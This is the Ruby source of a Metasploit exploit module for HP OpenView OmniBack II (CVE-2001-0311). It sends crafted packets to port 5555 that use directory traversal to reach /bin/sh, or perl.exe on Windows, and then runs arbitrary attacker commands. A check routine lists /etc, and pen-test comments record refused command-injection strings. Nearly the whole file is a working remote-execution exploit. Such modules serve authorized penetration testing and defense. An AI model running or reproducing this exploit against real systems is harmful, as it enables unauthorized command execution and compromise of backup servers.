Path: blob/master/modules/exploits/multi/misc/openview_omniback_exec.rb
19511 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'HP OpenView OmniBack II Command Execution',15'Description' => %q{16This module uses a vulnerability in the OpenView Omniback II17service to execute arbitrary commands. This vulnerability was18discovered by DiGiT and his code was used as the basis for this19module.2021For Microsoft Windows targets, due to module limitations, use the22"unix/cmd/generic" payload and set CMD to your command. You can only23pass a small amount of characters (4) to the command line on Windows.24},25'Author' => [ 'hdm', 'aushack' ],26'License' => MSF_LICENSE,27'References' => [28['CVE', '2001-0311'],29['OSVDB', '6018'],30['BID', '11032'],31['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],32],33'Platform' => ['unix'], # win34'Arch' => ARCH_CMD,35'Privileged' => false,36'Payload' => {37'Space' => 1024,38'DisableNops' => true,39'Compat' =>40{41'PayloadType' => 'cmd',42'RequiredCmd' => 'generic perl telnet',43}44},45'Targets' => [46[ 'Unix', {}],47[ 'Windows', {}],48],49'DisclosureDate' => '2001-02-28',50'DefaultTarget' => 0,51'Notes' => {52'Reliability' => UNKNOWN_RELIABILITY,53'Stability' => UNKNOWN_STABILITY,54'SideEffects' => UNKNOWN_SIDE_EFFECTS55}56)57)5859register_options(60[61Opt::RPORT(5555)62]63)64end6566def check67if (target.name =~ /Unix/)68connect6970poof =71"\x00\x00\x00.2" +72"\x00 a" +73"\x00 0" +74"\x00 0" +75"\x00 0" +76"\x00 A" +77"\x00 28" +78"\x00/../../../bin/sh" +79"\x00\x00" +80"digit " +81"AAAA\n\x00"8283sock.put(poof)84sock.put("echo /etc/*;\n")85res = sock.get_once(-1, 5)86disconnect8788if !(res and res.length > 0)89vprint_status("The remote service did not reply to our request")90return Exploit::CheckCode::Safe91end9293if (res =~ /passwd|group|resolv/)94vprint_status("The remote service is exploitable")95return Exploit::CheckCode::Vulnerable96end9798return Exploit::CheckCode::Safe99end100101if (target.name =~ /Windows/)102connect103104poof =105"\x00\x00\x00.2" +106"\x00 a" +107"\x00 0" +108"\x00 0" +109"\x00 0" +110"\x00 A" +111"\x00 28" +112"\x00\\perl.exe" +113"\x00\x20-e\x20system(dir)\x00\x00" +114"digit " +115"AAAA\n\x00"116117sock.put(poof)118res = sock.get_once(-1, 5)119disconnect120121print_status(res.to_s)122123if !(res and res.length > 0)124print_status("The remote service did not reply to our request")125return Exploit::CheckCode::Safe126end127128if (res =~ /V.o.l.u.m.e/) # Unicode129print_status("The remote service is exploitable")130return Exploit::CheckCode::Vulnerable131end132133return Exploit::CheckCode::Safe134end135end136137def exploit138if (target.name =~ /Unix/)139connect140141poof =142"\x00\x00\x00.2" +143"\x00 a" +144"\x00 0" +145"\x00 0" +146"\x00 0" +147"\x00 A" +148"\x00 28" +149"\x00/../../../bin/sh" +150"\x00\x00" +151"digit " +152"AAAA\n\x00"153154sock.put(poof)155sock.put(payload.encoded + ";\n")156res = sock.get_once(-1, 5)157158if !(res and res.length > 0)159print_status("The remote service did not reply to our request")160disconnect161return162end163164print(res)165166handler167disconnect168end169170if (target.name =~ /Windows/)171172# aushack173#174# Tested during pen test against Windows 2003 server.175# Windows Service details:176# - Data Protector Inet177# -> [HP OpenView Storage Data Protector] - Backup client service178# -> "C:\Program Files\OmniBack\bin\omniinet.exe"179# -> OmniInet service for Windows NT180# -> File version: 6.0.0.0181#182# This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.183#184# Notes:185# I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe186# Perhaps a difference in Windows/Unix code? Logs:187#188# 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384189# A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client190#191# 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384192# [RxNtIntegUtil] parameter refused: ..\foo.exe193#194# 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384195# A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client196#197# 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384198# [RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:199#200# 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384201# A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client202#203# 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384204# [RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >205206connect207208poof =209"\x00\x00\x00.2" +210"\x00 a" +211"\x00 0" +212"\x00 0" +213"\x00 0" +214"\x00 A" +215"\x00 28" +216"\x00\\perl.exe" +217"\x00\x20-esystem(#{payload.encoded})\x00\x00" +218"digit " +219"AAAA\n\x00"220221sock.put(poof)222# sock.put(payload.encoded + "\n")223res = sock.get_once(-1, 5)224225if !(res and res.length > 0)226print_status("The remote service did not reply to our request")227disconnect228return229end230231print(res)232233handler234disconnect235end236end237end238239240